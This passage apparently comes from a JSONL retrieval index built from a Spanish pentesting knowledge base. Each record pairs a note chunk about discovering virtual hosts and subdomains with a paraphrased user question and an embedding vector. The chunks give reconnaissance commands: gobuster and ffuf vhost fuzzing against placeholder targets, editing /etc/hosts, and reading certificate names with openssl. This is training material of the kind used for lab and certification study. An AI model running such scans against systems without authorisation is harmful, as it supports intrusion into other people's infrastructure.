0.01682, 0.05937, 0.01391, -0.0374, -0.0331, -0.08586, -0.01458, -0.00941, -0.10291, 0.01894, 0.01132, 0.01265, -0.06355, 0.07531, -0.04791, 0.03807, 0.00097, 0.00982, -0.00949, -0.10362, -0.05822, 0.05596, 0.05307, -0.05817, -0.02943, 0.04587, 0.00747, -0.00875, -0.03014, 0.04157, -0.1072, -0.02386, 0.01343, 0.01143, -0.06381, 0.03976, -0.01237, -0.03223, 0.04249, -0.03017, 0.04442, 0.02551, -0.04788, -0.01523, -0.00888, 0.03649, 0.01976, -0.03341, -0.07407, -0.06517, 0.01139, 0.03195, 0.02313, -0.00589, 0.00463, -0.03337, -0.0042, 0.05808, 0.03616, -0.03969, -0.02504, 0.00617, -0.01357, 0.0229, 0.02502, -0.05393, -0.01051, -0.01317, 0.04131, 0.02129, -0.00949, 0.05406, -0.00653, 0.00669, 0.00555, 0.03189, 0.0241, 0.06884, 0.04786, -0.05267, -0.00178, -0.00708, -0.00979, 0.01752, 0.05082, -0.04889, 0.00307, -0.00981, -0.04612, 0.0023, -0.03699, -0.02365, -0.08525, 0.0113, -0.00358, -0.03773, -0.03233, 0.03131]} +{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Vhosts y subdominios\n\n> Si te encuentras una \"default Apache page\", probablemente hay **virtual hosts** ocultos. Parte de Trampas de enumeraciΓ³n.", "indexar": "como detecto si hay virtual hosts ocultos que muestran una pagina por defecto?", "v": [0.25566, 0.05087, -0.24199, -0.03759, 0.015, -0.0566, -0.07859, 0.01614, 0.17841, -0.17788, -0.0201, -0.14711, -0.12069, -0.00877, 0.10827, 0.01581, 0.14357, -0.05677, 0.04493, 0.02994, -0.00365, -0.02445, -0.0111, -0.03127, 0.02865, 0.0156, -0.0226, 0.03263, -0.0676, -0.01753, -0.00325, -0.07607, -0.09037, 0.02375, -0.05864, -0.06663, -0.01817, -0.06034, 0.02997, 0.113, 0.04984, -0.00474, -0.03025, 0.03209, 0.02828, -0.02294, -0.14097, -0.00373, -0.02188, 0.03073, -0.0707, -0.0289, -0.20658, 0.03497, -0.00362, -0.08338, 0.04032, -0.02025, 0.17408, -0.09308, -0.04996, 0.01149, 0.06278, -0.00058, -0.00568, -0.01806, -0.08454, 0.04631, -0.08811, -0.02358, -0.02058, 0.005, 0.10321, 0.07668, 0.0312, 0.00933, 0.02115, -0.06825, 0.07093, 0.01384, -0.01454, 0.04315, -0.02117, 0.09674, -0.12089, -0.07723, -0.05916, 0.08544, -0.01211, -0.10613, 0.03569, 0.11253, 0.02446, -0.04947, 0.01834, -0.0573, 0.16003, 0.00493, 0.02969, 0.00188, -0.00278, 0.06995, -0.08307, 0.06976, 0.01596, 0.08693, -0.02539, 0.01636, -0.03742, 0.0099, 0.09566, -0.04586, -0.06877, -0.0249, 0.09242, 0.05112, 0.11248, 0.07775, 0.07836, -0.02907, -0.15984, -0.07139, -0.02495, -0.02518, 0.00703, -0.06702, -0.04736, 0.02585, 0.01017, 0.07332, -0.04402, -0.07789, -0.02017, -0.03451, -0.05243, 0.05907, 0.06857, 0.00937, -0.04629, -0.01005, 0.05729, -0.03482, -0.04176, -0.05608, 0.0373, -0.082, 0.00604, 0.02941, -0.10151, 0.03086, -0.00396, 0.07594, 0.04172, 0.01398, -0.05166, 0.07364, 0.01863, -0.01701, -0.06936, -0.00754, -0.00544, -0.03172, 0.00889, -0.01266, -0.01232, -0.00611, -0.05368, 0.02174, -0.01504, -0.02172, -0.05202, 0.04803, -0.04824, -0.05496, -0.06612, 0.03637, -0.01939, -0.07746, 0.05209, -0.03766, -0.01647, 0.01937, 0.02208, 0.0253, 0.03186, 0.01269, 0.06617, -0.04381, -0.0199, 0.00383, 0.05215, -0.10069, -0.05309, 0.1156, -0.0125, -0.0466, -0.00953, 0.00332, 0.12461, -0.05385, -0.00224, -0.06711, -0.04221, 0.02223, -0.0619, -0.05583, -0.00844, 0.00348, 0.02884, -0.01406, 0.04473, -0.08229, 0.03332, -0.10645, -0.01464, 0.05616, -0.00272, -0.02789, -0.01235, -0.03978, 0.03613, -0.03316, 0.01591, 0.00874, 0.00024, 0.0458, 0.01541, 0.06573, 0.06886, -0.01864, 0.00626, -0.00956, -0.06816, -0.00684, 0.00026, -0.04054, 0.01918, 0.04555, -0.0545, -0.02853, 0.01098, 0.04209, 0.05502, -0.07458, 0.04748, -0.03739, -0.03283, 0.01966, 0.01353, -0.02083, -0.08891, -0.02555, 0.07816, -0.05745, 0.00453, -0.02433]} +{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Vhosts y subdominios\n\n> Si te encuentras una \"default Apache page\", probablemente hay **virtual hosts** ocultos. Parte de Trampas de enumeraciΓ³n.", "indexar": "que herramienta me sirve para encontrar configuraciones de virtual hosts", "v": [0.04106, 0.09451, -0.27723, -0.20338, 0.09323, -0.14483, -0.06273, -0.08992, 0.08349, -0.19745, -0.04511, -0.14318, 0.05113, -0.07634, 0.08229, 0.08493, 0.10587, -0.19473, 0.03626, 0.11514, 0.01212, 0.01602, -0.06849, 0.0061, -0.09175, 0.02316, 0.07527, -0.03848, -0.16082, -0.01296, 0.06981, -0.02447, -0.05883, 0.00249, -0.02704, -0.08452, -0.02404, 0.06686, -0.03662, 0.05877, 0.06354, 0.00919, -0.01137, 0.05751, 0.03122, -0.00713, -0.03165, -0.06188, -0.01833, 0.06655, -0.06537, -0.14655, -0.12331, 0.05091, 0.05386, -0.11989, 0.17272, -0.20231, 0.08067, -0.14285, -0.15708, -0.0474, -0.03307, -0.01756, 0.07937, 0.04885, -0.03745, -0.03373, -0.13271, 0.02089, -0.07171, -0.00232, 0.02259, -0.08106, 0.04217, 0.01031, 0.0343, 0.05573, 0.10271, 0.0115, 0.07717, -0.02005, -0.10822, 0.00021, -0.07872, -0.04331, 0.06316, -0.03128, 0.08317, -0.03664, 0.03707, 0.06936, 0.00563, -0.03091, 0.02297, -0.05147, 0.10748, 0.0056, -0.00517, -0.02023, 0.09848, 0.06104, -0.10292, 0.09829, -0.04792, 0.03519, 0.00118, -0.03438, -0.04271, -0.04761, 0.10444, 0.03322, -0.01987, 0.04716, 0.04436, 0.00115, 0.0545, 0.03314, 0.07625, -0.05641, 0.00608, 0.02068, -0.0165, -0.00517, -0.03258, 0.05802, -0.03893, 0.03712, 0.03771, -0.02495, -0.05066, -0.09435, -0.01443, -0.02805, -0.02578, -0.01529, 0.04108, -0.08526, 0.00077, -0.06697, 0.0239, 0.05909, -0.02036, -0.12125, 0.03179, -0.02035, 0.02494, -0.0392, -0.01526, 0.01632, 0.03617, -0.01351, 0.03375, 0.00453, -0.09116, 0.03903, -0.07173, -0.00388, -0.11594, 0.04666, -0.02565, -0.06221, 0.04989, -0.0347, 0.01396, -0.05757, -0.01133, 0.02655, 0.07217, 0.06367, -0.01006, 0.0032, 0.02742, -0.07489, -0.02923, 0.00098, -0.04872, -0.03686, 0.0003, -0.04453, -0.02928, -0.03384, 0.00142, -0.00272, 0.01235, -0.01099, 0.05467, -0.00778, -0.01987, -0.01396, -0.00218, -0.00749, -0.03299, -0.00919, 0.02039, -0.0252, -0.04179, -0.02864, 0.0315, -0.03277, -0.01784, -0.02915, -0.0347, -0.05793, 0.01606, 0.06792, -0.01285, -0.0456, 0.01629, -0.00453, 0.0378, -0.02566, 0.01561, -0.02928, -0.01575, -0.00146, 0.04384, -0.00307, 0.01755, -0.04832, 0.01274, -0.04174, 0.00834, -0.00098, -0.00347, 0.03671, 0.02254, 0.00512, 0.01463, -0.05578, 0.00185, -0.04646, 0.00215, -0.00561, -0.012, -0.0764, 0.05448, 0.00683, -0.06311, 0.00712, 0.00215, 0.03216, 0.03874, -0.02737, -0.01028, -0.02265, -0.01754, -0.02747, -0.04327, -0.05082, -0.05533, -0.02728, 0.06422, -0.03514, -0.01767, 0.00769]} +{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Fuzzear vhosts\n```bash\ngobuster vhost -u http://IP -w /usr/share/seclists/Discovery/DNS/...\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP\n```", "indexar": "que programa hay para descubrir nombres de host que faltan en una direcciΓ³n web?", "v": [0.13427, 0.15789, -0.04988, -0.16587, 0.02507, -0.04281, -0.03945, -0.03444, 0.00706, -0.12432, 0.05912, -0.1387, -0.07439, -0.12165, 0.02516, -0.00047, 0.1801, -0.03101, 0.1657, 0.00715, -0.05802, 0.10305, -0.05537, 0.0435, -0.08115, -0.15667, 0.0153, 0.00637, -0.04251, 0.05474, 0.02857, -0.14631, -0.06889, -0.04776, 0.02763, 0.0709, 0.10104, -0.07334, 0.03016, 0.09193, -0.00877, 0.01441, 0.00319, 0.07103, -0.04753, -0.06858, -0.08809, -0.0099, 0.06525, -0.10497, -0.0112, -0.00749, -0.03034, 0.02411, 0.08271, -0.06077, -0.07481, -0.10088, -0.15379, 0.03098, -0.04305, 0.02373, 0.01747, 0.04981, 0.08821, -0.05325, 0.02824, 0.03659, -0.12557, -0.0025, 0.04545, -0.06595, 0.06643, -0.00488, 0.01467, -0.00046, 0.04694, -0.03127, 0.00362, 0.01259, 0.04414, -0.01973, -0.04727, 0.07496, -0.12159, 0.00108, 0.06069, -0.06296, -0.06836, -0.10539, 0.04477, 0.13018, -0.02272, 0.09806, -0.00559, -0.0457, 0.18247, 0.06557, 0.02944, 0.06085, 0.02165, 0.04168, -0.05137, 0.14993, -0.00311, 0.19886, 0.08319, -0.03759, -0.04557, 0.07536, -0.01156, 0.03641, -0.02312, -0.07787, -0.08092, -0.04033, 0.00315, -0.02789, 0.0689, -0.11668, -0.18963, -0.02227, -0.01139, 0.00754, 0.05378, 0.00408, -0.01094, 0.03892, 0.0707, -0.01567, 0.02674, -0.00858, -0.04249, -0.04442, 0.00917, 0.00317, 0.02898, 0.08882, 0.07643, -0.01797, -0.03583, 0.03303, 0.01339, -0.01103, 0.00778, 0.04219, 0.0378, -0.04543, -0.06822, 0.05663, -0.06247, 0.10732, 0.04452, 0.10298, -0.06384, -0.00234, 0.05693, -0.01288, -0.04792, -0.00739, -0.03359, -0.02729, -0.10071, -0.05489, 0.01498, -0.02058, -0.01394, 0.01394, 0.07059, 0.01862, -0.02035, 0.13892, -0.01645, -0.06891, -0.0197, 0.03909, -0.01635, -0.09023, 0.04809, 0.0332, -0.08498, -0.053, 0.00711, 0.07809, -0.00772, -0.00098, 0.00805, 0.02689, -0.05137, -0.03323, -0.01495, -0.00122, -0.06027, -0.01284, -0.04334, 0.05422, 0.03109, -0.00398, 0.08121, -0.02626, -0.03711, -0.00277, 0.02431, 0.04614, 0.01662, 0.02507, -0.04824, 0.02712, 0.01294, 0.03964, 0.02205, -0.07877, -0.00542, -0.01847, -0.08006, -0.06299, -0.02748, 0.03241, 0.01982, 0.104, -0.02058, -0.01882, 0.03835, 0.06253, 0.04795, -0.06512, 0.04706, -0.03219, 0.02405, -0.00915, 0.01964, -0.05652, 0.00952, -0.03034, 0.02551, -0.04671, -0.01157, -0.01695, -0.04367, 0.00551, -0.04846, 0.05802, 0.0162, -0.00659, -0.06365, -0.05583, -0.04099, 0.02556, -0.01468, 0.01157, -0.06016, 0.0307, -0.01358, -0.02576, 0.07, 0.00182]} +{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Fuzzear vhosts\n```bash\ngobuster vhost -u http://IP -w /usr/share/seclists/Discovery/DNS/...\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP\n```", "indexar": "con quΓ© puedo probar diferentes dominios para ver si existen?", "v": [0.01565, 0.12699, -0.1571, 0.09555, 0.01449, 0.09277, 0.1375, -0.05217, -0.14982, -0.13176, 0.01633, -0.05556, -0.01643, -0.18389, -0.04442, -0.02929, 0.21421, -0.03157, -0.04451, -0.04498, 0.00126, -0.1714, -0.12462, -0.078, 0.07283, -0.12952, 0.04906, -0.09824, 0.00614, 0.08976, -0.02667, -0.0458, 0.104, -0.01045, -0.11957, -0.06773, 0.01048, 0.06341, 0.12135, 0.0571, 0.08704, -0.02788, -0.03281, 0.02274, -0.12246, -0.03356, -0.17014, -0.0503, -0.07116, -0.11213, -0.04861, 0.01968, -0.0843, -0.03519, 0.03687, -0.05333, 0.10789, -0.07656, 0.09055, 0.00652, -0.103, -0.03915, 0.04328, 0.03365, 0.01896, -0.11739, -0.06291, 0.06005, -0.02635, 0.06455, -0.0309, 0.02008, -0.00224, -0.01393, 0.00887, 0.01136, 0.036, -0.06342, 0.09508, -0.03763, 0.05576, 0.05616, -0.09735, 0.00685, -0.06744, -0.19346, -0.15776, -0.10424, 0.02926, -0.08658, 0.10821, 0.03864, -0.02257, -0.02373, -0.01715, -0.02209, 0.0862, -0.01567, -0.06838, 0.00084, 0.03598, 0.14513, -0.13684, 0.10736, 0.0047, 0.0559, 0.04861, -0.08796, 0.00084, -0.04963, -0.0545, -0.09024, -0.11479, -0.01527, -0.07704, 0.0161, -0.1164, -0.0296, -0.01163, -0.0055, -0.05911, -0.01144, 0.00612, 0.04422, 0.06027, -0.01427, 0.00648, 0.00385, -0.00923, -0.02688, 0.02447, 0.02174, -0.02246, -0.05533, -0.00785, 0.06569, 0.0763, 0.00604, -0.03876, -0.0325, 0.00673, 0.02406, -0.01415, -0.02993, -0.00445, -0.0204, -0.02366, -0.04222, -0.07712, -0.02425, -0.08236, -0.049, -0.01552, 0.09049, -0.01545, 0.00408, -0.01388, -0.06523, -0.02843, 0.05443, -0.04721, 0.04416, -0.06434, 0.00388, 0.02274, -0.00568, -0.01361, -0.0245, 0.0094, 0.06636, -0.03848, 0.0917, -0.03588, -0.00936, 0.04931, -0.00539, -0.08263, 0.00417, -0.01096, -0.05332, -0.02413, -0.02825, -0.03176, 0.05826, -0.01041, 0.01563, 0.00961, 0.02885, 0.00817, 0.05906, 0.06988, 0.07543, -0.0413, 0.02348, 0.02319, -0.02412, 0.05064, -0.07524, -0.0426, -0.02706, -0.0291, -0.04991, -0.02433, -0.04345, -0.0007, -0.00309, -0.02199, 0.06201, -0.00635, -0.04616, 0.00368, -0.01473, 0.05394, -0.06617, -0.06278, 0.0288, -0.01795, -0.0007, -0.03656, -0.06349, -0.03884, 0.0403, 0.03871, -0.02633, 0.02175, 0.08197, 0.02392, 0.02258, 0.0407, 0.04265, 0.00361, 0.04721, 0.00119, -0.00827, 0.02299, 0.03111, 0.04106, -0.01305, -0.03685, -0.00742, -0.05768, 0.05634, -0.00887, -0.026, -0.01832, -0.08791, -0.07124, 0.00296, -0.06829, -0.02541, 0.01584, 0.04315, 0.02714, -0.0326, 0.00245, 0.00859]} +{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## /etc/hosts\n- Si la web carga rara o redirige, mira el header `Host:`.\n- **AΓ±ade el dominio a `/etc/hosts` SIEMPRE** que aparezca un hostname.", "indexar": "con quΓ© puedo forzar que una pΓ‘gina web cargue sin errores?", "v": [-0.18532, 0.06765, 0.02035, 0.0001, -0.03266, -0.04438, -0.00443, 0.01845, -0.00087, -0.06202, -0.09883, -0.10934, -0.11151, -0.03583, 0.04745, 0.07864, 0.03914, 0.06237, 0.08968, -0.07676, 0.06412, -0.0486, 0.02044, -0.15201, -0.09265, -0.01757, -0.03462, -0.05554, -0.15999, -0.05051, -0.15205, -0.03411, 0.07946, 0.01554, -0.08225, 0.10201, 0.09985, 0.07183, 0.02518, -0.03112, 0.04933, 0.03143, -0.07427, 0.1011, 0.06494, -0.01564, -0.00736, -0.04303, 0.05861, 0.06618, 0.07311, -0.05833, -0.03877, -0.00738, -0.06375, 0.0358, 0.22214, -0.09666, 0.06141, -0.10043, 0.01188, 0.04747, 0.00984, 0.04243, -0.07079, 0.03744, 0.02286, 0.02217, -0.00149, 0.07883, 0.11183, -0.0079, 0.0764, -0.06579, -0.00033, -0.0593, 0.03513, -0.01797, -0.00226, 0.02962, 0.06613, 0.03285, -0.04511, 0.00167, -0.00048, -0.00935, -0.02623, -0.02474, 0.06671, -0.13119, 0.0337, 0.07215, -0.01252, -0.07544, -0.16423, -0.13363, 0.0954, -0.00878, 0.01801, -0.07161, -0.01059, -0.01495, -0.09204, 0.02607, -0.04994, -0.00099, 0.03806, -0.01743, 0.04475, -0.0809, -0.0129, -0.01879, -0.09319, -0.0895, -0.04456, 0.11183, 0.0532, 0.09684, -0.08778, -0.07232, -0.03848, -0.13492, -0.01654, -0.07954, -0.05036, 0.08103, 0.05235, 0.1412, -0.04478, -0.02534, -0.03019, -0.05196, -0.03761, -0.0326, 0.15544, 0.03855, 0.04312, 0.02469, -0.00807, 0.05861, 0.02392, -0.05541, -0.11124, -0.00788, -0.03457, -0.04739, 0.00532, -0.01608, -0.10054, -0.06004, -0.06329, 0.04899, 0.09496, -0.01444, -0.0462, 0.0093, -0.01327, -0.00258, 0.09185, -0.12325, -0.05393, 0.032, 0.01853, 0.07849, 0.03374, 0.01082, -0.12592, 0.07979, 0.03811, 0.00401, -0.00927, 0.1079, -0.01456, -0.1737, 0.03711, 0.02746, -0.07295, 0.03021, -0.01641, -0.00301, -0.01777, -0.08269, -0.08003, 0.08981, -0.0004, -0.00845, 0.02212, -0.00549, 0.00518, -0.0308, -0.02865, 0.00628, -0.08825, -0.01236, 0.02792, 0.08987, 0.00917, 0.05192, 0.07436, -0.04471, -0.004, -0.06624, -0.02401, 0.00964, -0.03384, -0.0252, 0.01538, -0.0295, 0.02431, 0.01692, 0.01202, -0.05115, 0.05955, -0.10739, -0.04888, 0.0139, 0.07815, 0.05103, -0.07195, -0.04253, 0.0765, -0.03034, -0.03962, 0.00994, 0.01053, 0.06342, 0.0219, -0.04277, -0.0037, 0.00811, -0.01469, -0.0321, -0.05434, -0.05647, 0.00616, -0.01575, 0.01076, 0.03903, -0.04813, -0.00255, 0.01745, 0.00429, 0.00542, -0.05845, 0.06121, -0.04436, -0.04132, -0.05418, 0.00094, -0.00551, -0.05023, -0.05776, -0.02527, -0.03443, 0.0034, -0.01854]} +{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## /etc/hosts\n- Si la web carga rara o redirige, mira el header `Host:`.\n- **AΓ±ade el dominio a `/etc/hosts` SIEMPRE** que aparezca un hostname.", "indexar": "cΓ³mo verifico si un dominio estΓ‘ mal configurado en mi sistema?", "v": [0.02765, 0.12749, -0.22158, -0.09256, 0.02126, -0.05298, 0.04712, -0.03141, -0.18189, -0.13071, -0.04194, -0.09378, -0.01531, -0.19586, 0.08699, -0.06293, 0.14948, -0.10087, -0.0496, -0.01404, -0.03486, -0.19177, -0.00784, -0.02295, 0.0338, -0.02018, -0.03012, -0.09377, -0.175, 0.03326, 0.06588, -0.02346, 0.07733, 0.02901, -0.07929, -0.00189, 0.06071, 0.0293, 0.07948, 0.12197, 0.04536, -0.11813, 0.01619, 0.05224, 0.00737, -0.10569, 0.04981, -0.15033, -0.01123, -0.10705, 0.00752, -0.02311, -0.13861, -0.01208, 0.01137, -0.06543, 0.08499, -0.04942, 0.16556, -0.04602, -0.04096, -0.08445, 0.06273, 0.14456, -0.03982, 0.00302, 0.03862, 0.04828, 0.05303, 0.03384, 0.04999, 0.001, -0.01192, -0.00648, 0.07347, -0.00852, 0.16161, -0.0602, 0.15094, -0.03587, 0.02648, 0.01247, -0.09346, -0.01196, -0.1559, -0.04496, -0.10439, -0.08337, 0.00263, 0.01018, 0.03242, -0.02942, -0.02066, -0.02578, 0.02579, -0.00272, 0.03885, -0.01692, -0.08557, -0.04629, 0.0117, 0.107, -0.11297, 0.10989, 0.02156, 0.04088, 0.02522, -0.05966, 0.04703, -0.05093, -0.00464, -0.00295, -0.05578, -0.06486, -0.02935, 0.03647, 0.00835, 0.04649, 0.02169, -0.06953, -0.07221, 0.02886, 0.01785, -0.11478, 0.08166, 0.04763, 0.03481, -0.01758, 0.04805, -0.0055, 0.01103, -0.0444, -0.02198, -0.00639, -0.01976, 0.02125, -0.0217, 0.00023, -0.09572, 0.01723, -0.00232, 0.10176, 0.04346, -0.02857, 0.07641, -0.00906, 0.04008, -0.08205, -0.10783, 0.01877, -0.11412, 0.00754, 0.00077, 0.02437, -0.04723, 0.02578, -0.002, -0.06469, 0.0023, -0.01253, 0.01287, -0.04918, 0.02032, -0.01963, 0.06241, 0.05201, 0.01835, 0.00943, 0.03874, -0.00308, -0.03484, 0.02962, 0.02139, -0.00831, 0.0088, 0.01045, 0.03181, -0.06499, 0.00839, 0.0624, -0.07927, 0.00971, 0.03184, 0.03761, -0.05284, 0.08307, 0.02705, 0.03487, -0.00604, 0.07148, 0.08957, 0.03432, 0.01296, 0.0121, 0.05186, 1e-05, -0.02572, -0.07072, -0.03817, 0.03636, -0.04185, -0.02235, 0.02429, -0.05137, -0.05441, 0.02372, 0.04639, -0.05123, 0.03068, 0.05437, -0.00398, 0.03808, 0.04963, -0.02217, -0.08279, 0.03173, -0.03468, -0.00343, -0.0298, -0.1109, -0.04428, 0.02763, 0.03271, 4e-05, -0.03094, 0.02777, -0.04154, 0.04738, 0.02353, 0.03005, -0.01297, -0.04876, 0.00459, 0.01956, 0.02204, -0.02788, 0.04952, 0.01429, 0.00629, -0.05329, 0.03849, 0.08761, 0.05897, -0.07428, -0.03599, -0.03696, -0.0749, -0.01674, -0.01899, -0.02927, 0.01698, 0.02056, 0.03647, -0.08055, -0.0285, -0.00853]} +{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## /etc/hosts\n- Si la web carga rara o redirige, mira el header `Host:`.\n- **AΓ±ade el dominio a `/etc/hosts` SIEMPRE** que aparezca un hostname.", "indexar": "quΓ© programa sirve para aΓ±adir un nombre de mΓ‘quina a la lista local de direcciones?", "v": [0.0296, 0.14539, -0.10547, -0.15473, -0.00931, -0.17247, -0.01598, -0.09512, -0.10152, -0.1351, -0.05424, -0.14517, 0.03178, -0.16461, 0.06708, -0.0183, 0.09314, -0.11029, 0.09428, 0.02289, -0.01797, 0.03107, -0.06409, 0.04659, -0.11542, 0.04776, 0.09192, -0.1148, -0.18097, 0.08127, 0.04526, -0.033, -0.00082, -0.09665, 0.0552, -0.03061, 0.12313, -0.03664, -0.01537, 0.02534, 0.0339, 0.04381, -0.13293, 0.06694, -0.00491, -0.01263, 0.06012, 0.09647, 0.01978, -0.01286, -0.06228, -0.0188, -0.00146, 0.02847, 0.01835, -0.08089, -0.05888, -0.0838, -0.06991, 0.01149, -0.09156, -0.03559, -0.08755, 0.00638, -0.02625, -0.02864, 0.00986, -0.02183, -0.06531, -0.10768, -0.08725, -0.01593, 0.05659, -0.03223, 0.00197, 0.05451, 0.04422, 0.02617, 0.0414, -0.06766, -0.01141, -0.02608, -0.08846, 0.00597, -0.05788, 0.02092, 0.06275, -0.04032, 0.03312, -0.0938, 0.04614, 0.11064, -0.01482, 0.09183, 0.13955, 0.01742, 0.11291, 0.11398, 0.03546, 0.08653, 0.13099, -0.06049, -0.03584, 0.16225, 0.04129, 0.1488, 0.08753, -0.01525, -0.02276, 0.01386, 0.01165, -0.01111, -0.06174, -0.03123, -0.07209, -0.05041, -0.02795, 0.05546, 0.01062, -0.03079, -0.12209, 0.02421, 0.02146, -0.01989, 0.01701, 0.0394, -0.00405, 0.12437, -0.04187, 0.03022, 0.03217, 0.04466, 0.00451, -0.06474, -0.04734, -0.05676, 0.0424, -0.03775, 0.03574, -0.04988, 0.03832, 0.07865, -0.00709, -0.03986, -0.02438, 0.00113, 0.0907, -0.06541, -0.04123, 0.04265, 0.05013, 0.00838, 0.01515, 0.10329, -0.05537, 0.03318, 0.03011, -0.03183, -0.03375, 0.03843, -0.03953, -0.01337, -0.06655, -0.00317, 0.01228, -0.02016, -0.00105, 0.06635, 0.12291, 0.03462, -0.01964, 0.11187, 0.00221, -0.04566, -0.02576, 0.00433, -0.00765, -0.04119, 0.04057, 0.0516, -0.03918, 0.05246, 0.03242, -0.00075, -0.00188, -0.03077, -0.00438, -0.03935, -0.00445, 0.04436, -0.02151, -0.0064, -0.07255, -0.01962, 0.01111, -0.00343, 0.02029, -0.01321, 0.0564, -0.07856, -0.09447, 0.004, -0.05136, 0.0358, 0.03545, 0.15134, -0.05723, -0.02024, 0.00238, 0.07783, -0.00143, -0.06291, 0.00943, 0.03354, -0.0686, -0.05207, -0.015, -0.0269, 0.03639, 0.07215, 0.00599, -0.05874, 0.01192, 0.0195, -0.01645, -0.02626, 0.10719, 0.02249, 0.10329, 0.03735, -0.03512, 0.00023, -0.00038, -0.06666, 0.01954, -0.02432, -0.00434, -0.0103, -0.04421, -0.06153, -0.03042, 0.12146, -0.00591, -0.07239, -0.07293, -0.0241, -0.06291, -0.01758, -0.00447, -0.03302, -0.10956, 0.05219, 0.04407, 0.02522, 0.05281, 0.0229]} +{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## HTTPS revela hostnames\n```bash\nopenssl s_client -connect IP:443\n```\n- El **certificado** te puede chivar el dominio real (CN / SAN).\n\nRelacionado: EnumeraciΓ³n web Β· Nmap Β· OSCP MOC", "indexar": "quΓ© herramienta me permite revelar los hostnames reales ocultos en un certificado HTTPS?", "v": [0.19406, -0.054, -0.12957, -0.0938, 0.13144, -0.13074, -0.06201, -0.05256, 0.08014, -0.01611, -0.1696, -0.03341, 0.01061, -0.03834, 0.15725, 0.02867, 0.08028, -0.05378, 0.01806, 0.02207, 0.00481, -0.08112, -0.19102, -0.04317, -0.04119, -0.10209, 0.07846, 0.10092, -0.13048, -0.05493, 0.08443, -0.0058, -0.13723, 0.07212, -0.11332, -0.00304, -0.07871, 0.02823, -0.00336, 0.05305, 0.09881, -0.01415, 0.03571, 0.12597, -0.04751, -0.01317, -0.08084, -0.06366, 0.05133, -0.07598, -0.01289, -0.15416, -0.26748, 0.01895, -0.04772, -0.03457, 0.1199, -0.01938, 0.01197, -0.13892, -0.06433, -0.07582, 0.05806, 0.01956, 0.03477, -0.03465, 0.02034, 0.07051, -0.14106, 0.03976, -0.00386, 0.0478, 0.09807, 0.00297, 0.0665, -0.02316, -0.00696, -0.07258, -0.00382, 0.00784, 0.09696, -0.03642, -0.00765, 0.04347, -0.05237, -0.04583, -0.0755, -0.03195, 0.05814, -0.07622, 0.08338, 0.08741, -0.03977, -0.02408, -0.0293, -0.04506, 0.11287, -0.05982, -0.05624, -0.02398, 0.02448, 0.11247, -0.07936, 0.08174, 0.06635, 0.11688, -0.01043, -0.03737, -0.05595, -0.02905, 0.09381, 0.05441, -0.08397, 0.03213, 0.00771, 0.04629, 0.01779, -0.00785, 0.03953, -0.07388, -0.0807, -0.05302, -0.06529, 0.01662, -0.00181, 0.02319, -0.10201, 0.01341, 0.00027, -0.07336, -0.02995, -0.0874, -0.05812, 0.02162, -0.07418, 0.0006, -0.01929, -0.12242, 0.01589, -0.01494, -0.02878, -0.01908, -0.04347, -0.06177, 0.09303, 0.03174, -0.02017, -0.04752, -0.01022, 0.00502, -0.01824, 0.00746, -0.02837, 0.02615, -0.07872, -0.02241, -0.03657, -0.08117, -0.11281, 0.08379, -0.00136, -0.04965, 0.00197, -0.01149, -0.02177, 0.044, -0.0201, 0.03819, 0.05769, 0.01645, 0.07298, 0.05471, 0.0027, -0.06781, 0.00704, -0.01426, -0.03096, -0.07563, -0.0071, -0.082, 0.01451, -0.00305, 0.05675, -0.01423, 0.03498, 0.00018, 0.03205, -0.03284, -0.03149, 0.02531, 0.01397, 0.00918, -0.06318, 0.03183, 0.01302, 0.01154, -0.01904, -0.05976, 0.04226, -0.06701, -0.05828, -0.0602, 0.0209, -0.06588, 0.00319, 0.01559, -0.02005, 0.0234, -0.03843, 0.00691, 0.01616, -0.05652, 0.05795, -0.05221, -0.00675, 0.04186, -0.01847, 0.01466, -0.06109, -0.0323, 0.0291, -0.025, 0.0614, -0.02792, 0.04291, 0.01574, 0.04389, 0.017, -0.00378, -0.04165, -0.0024, -0.04964, -0.07493, 0.01872, 0.06317, -0.03124, 0.00261, 0.02535, -0.07028, 0.01884, 0.0058, 0.06125, 0.01884, -0.05518, 0.03299, -0.04418, -0.04764, -0.03453, -0.01446, -0.03072, -0.08508, 0.00195, 0.04052, -0.06675, -0.01102, -0.00318]} +{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## HTTPS revela hostnames\n```bash\nopenssl s_client -connect IP:443\n```\n- El **certificado** te puede chivar el dominio real (CN / SAN).\n\nRelacionado: EnumeraciΓ³n web Β· Nmap Β· OSCP MOC", "indexar": "con quΓ© puedo obtener la informaciΓ³n del campo CN o SAN de un certificado SSL?", 